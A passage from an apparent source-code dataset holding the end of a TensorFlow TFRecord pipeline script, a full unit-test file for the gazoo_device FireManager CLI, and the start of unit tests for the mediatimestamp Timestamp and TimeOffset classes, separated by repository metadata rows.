                    # inside cv2.cvtColor with a None input.
                    continue
                img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
                img = cv2.resize(img, img_size)
                # One-hot label from the 1-based class id in the filename.
                label = np.zeros(shape=[num_classes], dtype=np.uint8)
                label[int(filename.split('_')[0]) - 1] = 1
                img_raw = img.tostring()  # raw pixel bytes for the record
                example = tf.train.Example(
                    features=tf.train.Features(
                        feature={
                            "label": tf.train.Feature(bytes_list=tf.train.BytesList(value=[label.tostring()])),
                            'data_raw': tf.train.Feature(bytes_list=tf.train.BytesList(value=[img_raw]))
                        }
                    )
                )
                # "<class>_<index>.jpeg" -> int index ('.jpeg' is 5 chars).
                index = int(filename.split('_')[1][:-5])
                if index % 5 == 0:
                    valid_writer.write(example.SerializeToString())
                else:
                    train_writer.write(example.SerializeToString())
def readRecords(filename):
    """Build the TF1 input pipeline for one TFRecord file.

    Returns an ``(image, label)`` tensor pair: the image decoded into a
    float32 ``[256, 256, 3]`` tensor rescaled into [-0.5, 0.5), the label a
    uint8 vector of length 30 (one-hot, as written by makeData()).
    """
    # Queue of input files; here a single file is cycled indefinitely.
    queue = tf.train.string_input_producer([filename])
    _, record = tf.TFRecordReader().read(queue)
    parsed = tf.parse_single_example(
        record,
        features={
            'data_raw': tf.FixedLenFeature([], tf.string),
            'label': tf.FixedLenFeature([], tf.string),
        }
    )
    image = tf.decode_raw(parsed['data_raw'], tf.uint8)
    image = tf.reshape(image, [256, 256, 3])
    # Normalise pixel bytes from [0, 255] into [-0.5, 0.5).
    image = tf.cast(image, tf.float32) * (1. / 255) - 0.5
    label = tf.reshape(tf.decode_raw(parsed['label'], tf.uint8), [30])
    return image, label
def test_records():
    """Smoke-test the TFRecord pipeline: read 10 shuffled batches and print them."""
    img, label = readRecords("train.tfrecords")
    img_batch, label_batch = tf.train.shuffle_batch([img, label],
                                                    batch_size=30, capacity=2000,
                                                    min_after_dequeue=1000)
    with tf.Session() as sess:
        # initialize_all_variables() has been deprecated since TF 0.12;
        # global_variables_initializer() is the supported TF1 replacement.
        sess.run(tf.global_variables_initializer())
        # A Coordinator lets us stop and join the queue-runner threads so the
        # process exits cleanly (the original started them and never stopped).
        coord = tf.train.Coordinator()
        threads = tf.train.start_queue_runners(sess=sess, coord=coord)
        try:
            # Pull 10 sample batches.
            for _ in range(10):
                val, l = sess.run([img_batch, label_batch])
                print(val.shape, l)
        finally:
            coord.request_stop()
            coord.join(threads)
if __name__ == '__main__':
    # Uncomment makeData() to (re)generate the TFRecord files first;
    # by default only the read pipeline is exercised.
    # makeData()
    test_records()
| 36.988636
| 112
| 0.515822
|
794b13b0d5296972d6986702e6a6ce6e32898f91
| 22,773
|
py
|
Python
|
gazoo_device/tests/unit_tests/fire_manager_test.py
|
google/gazoo-device
|
f333b386f5993c8d4c9e12c89ebb620a0c4f5506
|
[
"Apache-2.0"
] | 14
|
2020-11-05T23:23:32.000Z
|
2022-03-01T18:59:29.000Z
|
gazoo_device/tests/unit_tests/fire_manager_test.py
|
google/gazoo-device
|
f333b386f5993c8d4c9e12c89ebb620a0c4f5506
|
[
"Apache-2.0"
] | null | null | null |
gazoo_device/tests/unit_tests/fire_manager_test.py
|
google/gazoo-device
|
f333b386f5993c8d4c9e12c89ebb620a0c4f5506
|
[
"Apache-2.0"
] | 5
|
2021-05-20T22:52:51.000Z
|
2022-02-21T08:46:21.000Z
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This test script verifies FireManager is working."""
import json
import multiprocessing
import os
import re
from unittest import mock
from gazoo_device import console
from gazoo_device import errors
from gazoo_device import fire_manager
from gazoo_device import gdm_logger
from gazoo_device import manager
from gazoo_device import package_registrar
from gazoo_device import testbed
from gazoo_device.switchboard import switchboard
from gazoo_device.tests.unit_tests import manager_test
from gazoo_device.tests.unit_tests.utils import fake_devices
from gazoo_device.tests.unit_tests.utils import unit_test_case
from gazoo_device.utility import usb_utils
import yaml
logger = gdm_logger.get_logger()
class FireManagerTests(manager_test.ManagerTestsSetup):
"""Unit tests for the fire_manager.py module (CLI extension of manager.py)."""
  def setUp(self):
    """Create the FireManager under test with process spawning and Switchboard mocked out."""
    super().setUp()
    # Patch multiprocessing.Manager so constructing FireManager does not
    # spawn a real manager process during unit tests.
    with mock.patch.object(multiprocessing, "Manager"):
      self.uut = fire_manager.FireManager(
          debug=False, dev_debug=False, quiet=False)
    self.mock_switchboard = mock.MagicMock(spec=switchboard.SwitchboardDefault)
    self.mock_switchboard.device_name = "FakeDevice"
    self.mock_switchboard.button_list = []
    # Every device the manager creates receives the mocked Switchboard.
    self.uut.create_switchboard = mock.MagicMock(
        return_value=self.mock_switchboard)
    self.uut.reload_configuration(  # Load the mock device configuration files
        device_file_name=self.files["device_file_name"],
        options_file_name=self.files["device_options_file_name"],
        testbeds_file_name=self.files["testbeds_file_name"],
        gdm_config_file_name=self.files["gdm_config_file_name"],
        log_directory=self.artifacts_directory)
def test_01a_man_all(self):
"""Test "gdm man" without parameters. Same as "gdm helpfull"."""
# Some examples from each device group. Examples don't have to be exhaustive
test_cases = {
"Primary": ["sshdevice"],
"Auxiliary": ["cambrionix", "powerswitch", "yepkit"]
}
with mock.patch.object(fire_manager.logger, "info") as mock_logger_info:
fire_manager.FireManager.man()
mock_logger_info.assert_called_once()
man = mock_logger_info.call_args[0][0]
for device_group, some_expected_devices in test_cases.items():
regex = r"{group}:\n((?:\s+\w+)+)\n\n".format(group=device_group)
actual_devices = re.search(regex, man).group(1).splitlines()
actual_devices = [device.strip() for device in actual_devices]
for expected_device in some_expected_devices:
self.assertIn(expected_device, actual_devices)
def test_01b_helpfull(self):
"""Verify the helpfull() method works."""
fire_manager.FireManager.helpfull()
def test_02_man_valid_device_types(self):
"""Test "gdm man <device_type>" for several device types."""
for device_type in ["sshdevice", "cambrionix"]:
fire_manager.FireManager.man(device_type)
def test_03_man_invalid_device_type(self):
"""Test "gdm man <device_type>" for an invalid device type."""
err_msg = "Device type tthdevice is not known."
with self.assertRaisesRegex(errors.DeviceError, err_msg):
fire_manager.FireManager.man("tthdevice")
with self.assertRaisesRegex(errors.DeviceError, err_msg):
fire_manager.FireManager.man("tthdevice", "reboot")
def test_04_man_class_member(self):
"""Test "gdm man <device_type> <class_member>" for valid attributes."""
test_cases = [
("sshdevice", "reboot"), # Method of a primary device
("sshdevice", "file_transfer"), # Capability of a primary device
("sshdevice", "_verify_reboot"), # Private method
("sshdevice", "communication_address"), # Property
("sshdevice", "console_port_name"), # Deprecated property alias
("cambrionix", "set_mode"), # Deprecated method alias
]
for device_type, class_member_name in test_cases:
fire_manager.FireManager.man(device_type, class_member_name)
def test_05_man_class_member_unknown(self):
"""Test "gdm man <device_type> <class member>" for invalid member."""
regex = r"sshdevice.*does not have attribute 'foo'"
with self.assertRaisesRegex(AttributeError, regex):
fire_manager.FireManager.man("sshdevice", "foo")
def test_06a_man_capability_attributes(self):
"""Test man on capability attributes ("gdm man device.capability.attr")."""
test_cases = (
# Capability method
("cambrionix", "switch_power", "power_off"),
# Capability property
("cambrionix", "switch_power", "supported_modes"),
# Capability deprecated property
("sshdevice", "usb_hub", "power_off"),
)
for device_type, capability, capability_attr in test_cases:
command = f"man {device_type} {capability} {capability_attr}"
with self.subTest(command=command):
fire_manager.FireManager.man(device_type, capability, capability_attr)
def test_06b_man_bad_capability_attribute(self):
"""Test man on nonexistent/non-capability class attributes."""
regex = r"cambrionix.switch_power.*does not have attribute 'foo'"
with self.assertRaisesRegex(AttributeError, regex):
fire_manager.FireManager.man("cambrionix", "switch_power", "foo")
regex = r"cambrionix.reboot.*is not a capability"
with self.assertRaisesRegex(TypeError, regex):
fire_manager.FireManager.man("cambrionix", "reboot", "something")
def test_07_man_nested_access(self):
"""Test nested access "gdm man <device_type>.<class member>"."""
expected_docs = fire_manager.FireManager.man("cambrionix", "reboot")
actual_docs = fire_manager.FireManager.man("cambrionix.reboot")
self.assertEqual(expected_docs, actual_docs)
expected_docs = fire_manager.FireManager.man("cambrionix", "switch_power",
"power_off")
actual_docs = fire_manager.FireManager.man(
"cambrionix.switch_power.power_off")
self.assertEqual(expected_docs, actual_docs)
def test_07a_man_dash_separated_vs_underscore(self):
"""Verify dash-separated names are converted to underscore_separated."""
expected_docs = fire_manager.FireManager.man("unifi_switch", "switch_power",
"power_off")
actual_docs = fire_manager.FireManager.man("unifi-switch", "switch-power",
"power-off")
self.assertEqual(expected_docs, actual_docs)
def test_08_man_device_type_deprecated(self):
"""Test "gdm man <device_type> --deprecated"."""
for device_type in ["sshdevice", "cambrionix"]:
fire_manager.FireManager.man(device_type, deprecated=True)
@mock.patch.object(
usb_utils,
"get_address_to_usb_info_dict",
return_value=manager_test.USB_INFO_DICT)
def test_10_print_usb_info(self, mock_usb_info_dict):
"""Test usb_info keys are printed."""
self.uut.print_usb_info()
mock_usb_info_dict.assert_called_once()
def test_11_issue(self):
"""Test that FireManager.issue() runs all health checks."""
with manager_test.MockOutDevices():
self.uut.issue("sshdevice-0000")
fake_devices.FakeSSHDevice.make_device_ready.assert_called_once_with("on")
def test_12_exec(self):
"""Test that FireManager.exec() does not run health checks."""
with manager_test.MockOutDevices():
self.uut.exec("sshdevice-0000")
fake_devices.FakeSSHDevice.make_device_ready.assert_called_once_with(
"off")
@mock.patch.object(fake_devices.FakeSSHDevice, "close")
def test_13_health_check_success_without_recover(self, mock_close):
"""Test FireManager.health_check(recover=False) success."""
with manager_test.MockOutDevices():
self.uut.health_check("sshdevice-0000", recover=False)
fake_devices.FakeSSHDevice.make_device_ready.assert_called_with(
setting="check_only")
mock_close.assert_called_once()
@mock.patch.object(fake_devices.FakeSSHDevice, "close")
def test_14_health_check_success_with_recover(self, mock_close):
"""Test FireManager.health_check(recover=True) success."""
with manager_test.MockOutDevices():
self.uut.health_check("sshdevice-0000", recover=True)
fake_devices.FakeSSHDevice.make_device_ready.assert_called_with(
setting="on")
mock_close.assert_called_once()
@mock.patch.object(fake_devices.FakeSSHDevice, "close")
def test_15_health_check_raises_on_error(self, mock_close):
"""Test that FireManager.health_check() raises when health checks fail."""
def mock_make_device_ready(setting="on"):
"""Succeeds if health checks are skipped, but fails if they do run."""
if setting == "off":
return
raise errors.DeviceNotResponsiveError("sshdevice-0000",
"Did not respond to 'foo' in 10s")
with manager_test.MockOutDevices():
with mock.patch.object(fake_devices.FakeSSHDevice, "make_device_ready",
side_effect=mock_make_device_ready):
with self.assertRaises(errors.DeviceNotResponsiveError):
self.uut.health_check("sshdevice-0000")
fake_devices.FakeSSHDevice.make_device_ready.assert_called_with(
setting="check_only")
mock_close.assert_called_once()
def test_16_get_prop(self):
"""Test FireManager.get_prop() retrieves all properties successfully."""
with manager_test.MockOutDevices():
self.uut.get_prop("sshdevice-0000")
def test_17_get_prop_single_property(self):
"""Test FireManager.get_prop() retrieves a single property successfully."""
with manager_test.MockOutDevices():
self.uut.get_prop("sshdevice-0000", "firmware_version")
def test_18_get_prop_manager_no_such_property(self):
"""Test get_prop() raises an error when property isn't in Manager config."""
with self.assertRaisesRegex(errors.DeviceError,
"Unable to find prop foobar in manager config"):
self.uut.get_prop("manager", "foobar")
def test_19_log_file_never_created(self):
"""Ensures stream device raises error if log file is never created."""
with mock.patch.object(
fire_manager, "MAX_TIME_TO_WAIT_FOR_INITATION", new=0.1):
with self.assertRaisesRegex(errors.DeviceError,
"Log file not created within 0.1 seconds"):
with manager_test.MockOutDevices():
self.uut.log("sshdevice-0000", self.device_log_file, duration=0.1)
def test_20_log_success(self):
"""Places logs in the file and invokes log and stops when requested."""
with manager_test.MockOutDevices():
self._create_log_file(2)
self.uut.log(
"sshdevice-0000", os.path.basename(self.device_log_file), duration=.2)
@mock.patch.object(testbed.Testbed, "make_testbed_ready")
def test_30_make_devices_ready_success(self, make_testbed_ready_mock):
"""Verify make_devices_ready returns is_healthy=True."""
self.addCleanup(logger.setLevel, logger.getEffectiveLevel())
testing_props = {
"paired": True,
"wifi_ssid": "GazooDevice!"
}
with manager_test.MockOutDevices():
mock_devices_health = json.loads(
self.uut.make_devices_ready(self.first_name + "," + self.second_name,
testing_props))
self.assertTrue(mock_devices_health[self.first_name]["is_healthy"])
self.assertTrue(mock_devices_health[self.second_name]["is_healthy"])
make_testbed_ready_mock.assert_called_once()
def test_31_make_devices_ready_single_device_success(self):
"""Verify _make_devices_ready_single_device returns is_healthy=True."""
self.addCleanup(logger.setLevel, logger.getEffectiveLevel())
with manager_test.MockOutDevices():
device = self.uut.create_device(self.first_name)
parameter_dict = {"sshdevice": {"setting": "on"}}
device_health = self.uut._make_devices_ready_single_device(
device, parameter_dict)
self.assertTrue(device_health[self.first_name]["is_healthy"])
def test_32_make_devices_ready_single_device_log_path(self):
"""Verify _make_devices_ready_single_device returns log path."""
self.addCleanup(logger.setLevel, logger.getEffectiveLevel())
with manager_test.MockOutDevices():
device = self.uut.create_device(self.first_name)
parameter_dict = {"sshdevice": {"setting": "on"}}
device_health = self.uut._make_devices_ready_single_device(
device, parameter_dict)
self.assertEqual(device_health[self.first_name]["logs"],
device.log_file_name)
def test_33_make_devices_ready_unhealthy_not_known(self):
"""Verify make_devices_ready returns correct unhealthy reason."""
self.addCleanup(logger.setLevel, logger.getEffectiveLevel())
unknown_device_name = "gobbly-gook"
expected_error = errors.DeviceError(
"Device {} is not known. Close matches: ".format(unknown_device_name))
with manager_test.MockOutDevices():
mock_devices_health = json.loads(
self.uut.make_devices_ready([unknown_device_name, self.first_name]))
self.assertFalse(mock_devices_health[self.first_name]["unhealthy_reason"])
self.assertEqual(
mock_devices_health[unknown_device_name]["unhealthy_reason"],
str(expected_error))
def test_34_make_devices_ready_unhealthy_not_responsive(self):
"""Verify make_devices_ready returns correct error."""
self.addCleanup(logger.setLevel, logger.getEffectiveLevel())
testing_props = {
"paired": True,
"wifi_ssid": "GazooDevice!"
}
sshdevice_1, sshdevice_2, cambrionix = [
"sshdevice-0000", "sshdevice-0001", "cambrionix-1234"]
expected_error = errors.DeviceNotResponsiveError(
sshdevice_1, "failed make_device_ready")
expected_testbed_error = errors.CheckTestbedReadyError(
"wifi ssid not pingable")
with manager_test.MockOutDevices():
with mock.patch.object(
fake_devices.FakeSSHDevice,
"make_device_ready",
side_effect=expected_error):
with mock.patch.object(
testbed.Testbed,
"make_testbed_ready",
side_effect=expected_testbed_error):
mock_devices_health = json.loads(
self.uut.make_devices_ready(
[sshdevice_1, sshdevice_2, cambrionix],
testing_props))
self.assertEqual(mock_devices_health[sshdevice_1]["err_type"],
type(expected_error).__name__)
self.assertEqual(mock_devices_health[sshdevice_2]["err_type"],
type(expected_error).__name__)
self.assertEqual(mock_devices_health["testbed"]["err_type"],
type(expected_testbed_error).__name__)
self.assertFalse(mock_devices_health[cambrionix]["err_type"])
def test_35_make_devices_ready_single_device_unhealthy_not_responsive(self):
"""Verify _make_devices_ready_single_device returns unhealthy_reason."""
self.addCleanup(logger.setLevel, logger.getEffectiveLevel())
expected_error = errors.DeviceNotResponsiveError(
self.first_name, "failed make_device_ready")
with manager_test.MockOutDevices():
device = self.uut.create_device("sshdevice-0000")
with mock.patch.object(
fake_devices.FakeSSHDevice,
"make_device_ready",
side_effect=expected_error):
parameter_dict = {"sshdevice": {"setting": "on"}}
device_health = self.uut._make_devices_ready_single_device(
device, parameter_dict)
self.assertEqual(device_health["sshdevice-0000"]["unhealthy_reason"],
str(expected_error))
def test_36_get_persistent_prop_devices_success(self):
"""Verify get_persistent_prop_devices returns persistent device props."""
self.addCleanup(logger.setLevel, logger.getEffectiveLevel())
with manager_test.MockOutDevices():
mock_devices_props = yaml.safe_load(
self.uut.get_persistent_prop_devices(
[self.first_name, self.second_name]))
for device_name in mock_devices_props:
expected_props = manager_test.FAKE_DEVICES["devices"][device_name]
self.assertEqual(mock_devices_props[device_name], expected_props)
def test_37_get_persistent_prop_devices_unhealthy_devices(self):
"""Verify get_persistent_prop_devices returns empty json object."""
self.addCleanup(logger.setLevel, logger.getEffectiveLevel())
exception = errors.DeviceNotResponsiveError(self.first_name,
"failed make_device_ready")
with manager_test.MockOutDevices():
with mock.patch.object(
self.uut, "get_device_configuration", side_effect=exception):
mock_devices_props = yaml.safe_load(
self.uut.get_persistent_prop_devices(
[self.first_name, self.second_name]))
for device_name in mock_devices_props:
self.assertEqual(mock_devices_props[device_name], {})
def test_38_construct_health_dict_from_exception(self):
"""Verify health dictionary constructed in proper format from exception."""
err_msg = "device is unresponsive"
checks_passed = ["first_health_check", "second_health_check"]
properties = {"prop_name": "prop_val", "other_prop_name": "other_prop_val"}
exception = errors.CheckDeviceReadyError("device-1234", err_msg)
exception.checks_passed = checks_passed
exception.properties = properties
health_dict = self.uut._construct_health_dict_from_exception(exception)
self.assertEqual(health_dict.get("is_healthy"), False)
self.assertIn(err_msg, health_dict.get("unhealthy_reason"))
self.assertEqual(health_dict.get("err_type"), "CheckDeviceReadyError")
self.assertEqual(health_dict.get("checks_passed"), checks_passed)
self.assertEqual(health_dict.get("properties"), properties)
@mock.patch.object(
package_registrar, "import_and_register", return_value=True)
@mock.patch.object(manager.logger, "info")
def test_40_register_already_registered(self, mock_info,
mock_import_and_register):
"""Test register() when package has already been registered."""
with mock.patch.object(
self.uut,
"config",
new={"cli_extension_packages": ["registered_package"]}):
self.uut.register("registered_package")
self.assertEqual(self.uut.config["cli_extension_packages"],
["registered_package"])
mock_import_and_register.assert_not_called()
mock_info.assert_called_once_with(
"Package 'registered_package' is already registered with GDM CLI.")
@mock.patch.object(
package_registrar, "import_and_register", return_value=False)
@mock.patch.object(manager.logger, "info")
def test_41_register_failure(self, mock_info, mock_import_and_register):
"""Test register() when package registration or import fails."""
with mock.patch.object(
self.uut, "config", new={"cli_extension_packages": []}):
self.uut.register("invalid_or_missing_package")
self.assertEqual(self.uut.config["cli_extension_packages"], [])
mock_import_and_register.assert_called_once_with(
"invalid_or_missing_package", include_cli_instructions=True)
mock_info.assert_not_called()
@mock.patch.object(
package_registrar, "import_and_register", return_value=True)
@mock.patch.object(manager.logger, "info")
def test_42_register_success(self, mock_info, mock_import_and_register):
"""Test register() when package registration succeeds."""
with mock.patch.object(
self.uut, "config", new={"cli_extension_packages": []}):
self.uut.register("valid_package")
self.assertEqual(self.uut.config["cli_extension_packages"],
["valid_package"])
mock_import_and_register.assert_called_once_with(
"valid_package", include_cli_instructions=True)
mock_info.assert_called_once_with(
"Registered package 'valid_package' with GDM CLI.")
@mock.patch.object(manager.logger, "info")
def test_45_unregister_not_found(self, mock_info):
"""Test unregister() when package isn't registered."""
with mock.patch.object(
self.uut, "config", new={"cli_extension_packages": ["other_package"]}):
self.uut.unregister("not_registered_package")
self.assertEqual(self.uut.config["cli_extension_packages"],
["other_package"])
mock_info.assert_called_once_with(
"Package 'not_registered_package' is not registered with GDM CLI.")
@mock.patch.object(manager.logger, "info")
def test_46_unregister_success(self, mock_info):
"""Test unregister() for a registered package."""
with mock.patch.object(
self.uut,
"config",
new={"cli_extension_packages": ["some_package", "other_package"]}):
self.uut.unregister("some_package")
self.assertEqual(self.uut.config["cli_extension_packages"],
["other_package"])
mock_info.assert_called_once_with(
"Removed package 'some_package' from GDM CLI.")
def test_console_success(self):
"""Tests running console on a device which supports it."""
with mock.patch.object(console.ConsoleApp, "run"):
self.uut.console("sshdevice-0000")
# Check that the device has been closed and stdout logging has been
# reenabled.
self.assertNotIn("sshdevice-0000", self.uut.get_open_device_names())
self.assertIn(gdm_logger._stdout_handler, logger.logging_thread._handlers)
def test_console_no_switchboard(self):
"""Tests that console raises an error if Switchboard is not supported."""
with self.assertRaisesRegex(
NotImplementedError,
"cambrionix-1234 does not have a Switchboard capability"):
self.uut.console("cambrionix-1234")
# Check that the device has been closed and stdout logging has been
# reenabled.
self.assertNotIn("cambrionix-1234", self.uut.get_open_device_names())
self.assertIn(gdm_logger._stdout_handler, logger.logging_thread._handlers)
if __name__ == "__main__":
unit_test_case.main()
| 45.913306
| 80
| 0.711676
|
794b145a5ff16868ef1d08c0fdac9b845ce66259
| 20,645
|
py
|
Python
|
tests/test_timestamp.py
|
bbc/rd-apmm-python-lib-mediatimestamp
|
fbf44b11984fa6d45ff29f97093a7e907b140e13
|
[
"Apache-2.0"
] | 3
|
2018-09-07T01:26:08.000Z
|
2019-09-13T12:37:50.000Z
|
tests/test_timestamp.py
|
bbc/rd-apmm-python-lib-mediatimestamp
|
fbf44b11984fa6d45ff29f97093a7e907b140e13
|
[
"Apache-2.0"
] | 16
|
2018-08-17T09:27:43.000Z
|
2022-02-04T17:26:21.000Z
|
tests/test_timestamp.py
|
bbc/rd-apmm-python-lib-mediatimestamp
|
fbf44b11984fa6d45ff29f97093a7e907b140e13
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 British Broadcasting Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from unittest import mock
from datetime import datetime
from dateutil import tz
from mediatimestamp.immutable import (
Timestamp,
TimeOffset,
TsValueError,
mediatimestamp,
SupportsMediaTimestamp,
SupportsMediaTimeOffset,
mediatimeoffset)
class TestTimestamp(unittest.TestCase):
def test_mediatimestamp(self):
to = TimeOffset()
self.assertNotIsInstance(to, SupportsMediaTimestamp)
ts = Timestamp()
self.assertIsInstance(ts, SupportsMediaTimestamp)
self.assertIsInstance(ts, SupportsMediaTimeOffset)
self.assertEqual(ts, mediatimestamp(ts))
self.assertEqual(ts, mediatimeoffset(ts))
class _convertable (object):
def __mediatimestamp__(self) -> Timestamp:
return Timestamp()
c = _convertable()
self.assertIsInstance(c, SupportsMediaTimestamp)
self.assertIsInstance(c, SupportsMediaTimeOffset)
self.assertEqual(ts, mediatimestamp(c))
self.assertEqual(ts, mediatimeoffset(c))
def test_MAX_NANOSEC(self):
self.assertEqual(Timestamp.MAX_NANOSEC, 1000000000)
def test_get_time_pythonic(self):
"""This tests that the fallback pure python implementation of get_time works as expected."""
test_ts = [
(1512489451.0, Timestamp(1512489451 + 37, 0)),
(1512489451.1, Timestamp(1512489451 + 37, 100000000))
]
for t in test_ts:
with mock.patch("time.time") as time:
time.return_value = t[0]
gottime = Timestamp.get_time()
self.assertEqual(gottime, t[1], msg="Times not equal, expected: %r, got %r" % (t[1], gottime))
def test_iaddsub(self):
"""This tests integer addition and subtraction on timestamps."""
ts = Timestamp(10, 0)
ts += TimeOffset(1, 2)
self.assertEqual(ts, Timestamp(11, 2))
ts -= TimeOffset(1, 2)
self.assertEqual(ts, Timestamp(10, 0))
ts -= TimeOffset(100, 5)
self.assertEqual(ts, Timestamp(90, 5, -1))
ts = Timestamp(281474976710655, 999999999)
ts += TimeOffset(0, 1)
self.assertEqual(ts, Timestamp(281474976710655, 999999999))
toff = TimeOffset(10, 0)
toff -= TimeOffset(100, 0)
self.assertEqual(toff, TimeOffset(90, 0, -1))
toff = TimeOffset(10, 0)
toff -= TimeOffset(0, 1)
self.assertEqual(toff, TimeOffset(9, 999999999))
toff = TimeOffset(10, 500000000)
toff += TimeOffset(0, 500000000)
self.assertEqual(toff, TimeOffset(11, 0))
toff = TimeOffset(10, 500000000, -1)
toff -= TimeOffset(0, 500000000)
self.assertEqual(toff, TimeOffset(11, 0, -1))
toff = TimeOffset(10, 0, -1)
toff += TimeOffset(0, 500000000)
self.assertEqual(toff, TimeOffset(9, 500000000, -1))
def test_addsub(self):
"""This tests addition and subtraction on timestamps."""
tests_ts = [
(Timestamp(10, 0), '+', TimeOffset(1, 2), Timestamp(11, 2)),
(Timestamp(11, 2), '-', TimeOffset(1, 2), Timestamp(10, 0)),
(TimeOffset(11, 2), '-', TimeOffset(1, 2), TimeOffset(10, 0)),
(Timestamp(10, 0), '-', TimeOffset(11, 2), Timestamp(1, 2, -1)),
(TimeOffset(10, 0), '-', TimeOffset(11, 2), TimeOffset(1, 2, -1)),
(TimeOffset(10, 0), '-', Timestamp(11, 2), TimeOffset(1, 2, -1)),
(Timestamp(10, 0), '-', Timestamp(11, 2), TimeOffset(1, 2, -1)),
(Timestamp(11, 2), '-', Timestamp(10, 0), TimeOffset(1, 2, 1)),
]
for t in tests_ts:
if t[1] == '+':
r = t[0] + t[2]
else:
r = t[0] - t[2]
self.assertEqual(r, t[3],
msg="{!r} {} {!r} = {!r}, expected {!r}".format(t[0], t[1], t[2], r, t[3]))
self.assertEqual(type(r), type(t[3]),
msg=("type({!r} {} {!r}) == {!r}, expected {!r}"
.format(t[0], t[1], t[2], type(r), type(t[3]))))
def test_multdiv(self):
"""This tests multiplication and division on timestamps."""
tests_ts = [
(TimeOffset(10, 10), '*', 0, TimeOffset(0, 0)),
(TimeOffset(10, 10), '*', 10, TimeOffset(100, 100)),
(10, '*', TimeOffset(10, 10), TimeOffset(100, 100)),
(TimeOffset(10, 10), '*', (-10), TimeOffset(100, 100, -1)),
(TimeOffset(10, 10, -1), '*', 10, TimeOffset(100, 100, -1)),
(TimeOffset(100, 100), '//', 10, TimeOffset(10, 10)),
(TimeOffset(100, 100), '//', -10, TimeOffset(10, 10, -1)),
(TimeOffset(100, 100, -1), '//', 10, TimeOffset(10, 10, -1)),
(TimeOffset(281474976710654, 0), '//', 281474976710655, TimeOffset(0, 999999999)),
(Timestamp(100, 100), '//', 10, TimeOffset(10, 10)),
(TimeOffset(100, 100), '/', 10, TimeOffset(10, 10)),
(TimeOffset(100, 100), '/', -10, TimeOffset(10, 10, -1)),
(TimeOffset(100, 100, -1), '/', 10, TimeOffset(10, 10, -1)),
(TimeOffset(281474976710654, 0), '/', 281474976710655, TimeOffset(0, 999999999)),
(Timestamp(100, 100), '/', 10, TimeOffset(10, 10)),
(Timestamp(10, 10), '*', 10, TimeOffset(100, 100)),
(10, '*', Timestamp(10, 10), TimeOffset(100, 100)),
]
for t in tests_ts:
if t[1] == '*':
r = t[0] * t[2]
elif t[1] == '//':
r = t[0] // t[2]
else:
r = t[0] / t[2]
self.assertEqual(r, t[3],
msg="{!r} {} {!r} == {!r}, expected {!r}".format(t[0], t[1], t[2], r, t[3]))
self.assertEqual(type(r), type(t[3]),
msg=("type({!r} {} {!r}) == {!r}, expected {!r}"
.format(t[0], t[1], t[2], type(r), type(t[3]))))
def test_compare(self):
"""This tests comparison of timestamps."""
self.assertEqual(Timestamp(1, 2), Timestamp(1, 2))
self.assertNotEqual(Timestamp(1, 2), Timestamp(1, 3))
self.assertLess(Timestamp(1, 0), Timestamp(1, 2))
self.assertLessEqual(Timestamp(1, 2), Timestamp(1, 2))
self.assertGreater(Timestamp(2, 0), Timestamp(1, 0))
self.assertGreaterEqual(Timestamp(2, 0), Timestamp(2, 0))
self.assertNotEqual(Timestamp(2, 0), Timestamp(3, 0))
self.assertEqual(Timestamp(2, 0), 2)
self.assertGreater(Timestamp(2, 0), 1)
self.assertLess(Timestamp(2, 0), 3)
self.assertLess(TimeOffset(2, 0), 3)
self.assertGreaterEqual(TimeOffset(1, 0, 1), TimeOffset(1, 0, -1))
def test_invalid_str(self):
"""This tests that invalid strings fed into from_str raise exceptions."""
tests_ts = [
"a",
"2015-02-17T12:53:48.5",
"2015-02T12:53:48.5",
"2015-02-17T12:53.5",
"12:53:48.5"
]
for t in tests_ts:
try:
Timestamp.from_str(t)
self.assertTrue(False)
except Exception:
pass
def test_invalid_int(self):
"""This tests that invalid int values fed into timestamp constructor get normalised."""
tests_ts = [
(Timestamp(-1, 0), Timestamp(1, 0, -1)),
(Timestamp(281474976710656, 0), Timestamp(281474976710655, 999999999)),
(Timestamp(0, 1000000000), Timestamp(1, 0)),
(Timestamp(0, -1), Timestamp(0, 1, -1)),
(Timestamp(5, -1000000007), Timestamp(3, 999999993))
]
for t in tests_ts:
self.assertEqual(t[0], t[1])
def test_convert_str(self):
"""This tests that various string formats can be converted to timestamps."""
tests_ts = [
("1:2", Timestamp(1, 2)),
("1.2", Timestamp(1, 200000000)),
("1", Timestamp(1, 0)),
("2015-02-17T12:53:48.5Z", Timestamp(1424177663, 500000000)),
("2015-02-17T12:53:48.000102003Z", Timestamp(1424177663, 102003))
]
for t in tests_ts:
ts = Timestamp.from_str(t[0])
self.assertTrue(isinstance(ts, Timestamp))
self.assertEqual(ts, t[1])
def test_convert_sec_nsec(self):
"""This tests that the conversion to and from TAI second:nanosecond pairs works as expected."""
tests_ts = [
("0:0", TimeOffset(0, 0), "0:0"),
("0:1", TimeOffset(0, 1), "0:1"),
("-0:1", TimeOffset(0, 1, -1), "-0:1"),
("5", TimeOffset(5, 0), "5:0"),
("5:1", TimeOffset(5, 1), "5:1"),
("-5:1", TimeOffset(5, 1, -1), "-5:1"),
("5:999999999", TimeOffset(5, 999999999), "5:999999999")
]
for t in tests_ts:
ts = TimeOffset.from_sec_nsec(t[0])
self.assertEqual(
ts,
t[1],
msg="Called with {} {} {}".format(t[0], t[1], t[2]))
ts_str = ts.to_sec_nsec()
self.assertEqual(
ts_str,
t[2],
msg="Called with {} {} {}".format(t[0], t[1], t[2]))
self.assertEqual(ts_str, str(ts))
def test_ts_convert_tai_sec_nsec(self):
"""This tests that the conversion to and from TAI second:nanosecond pairs works as expected."""
tests_ts = [
("0:0", Timestamp(0, 0), "0:0"),
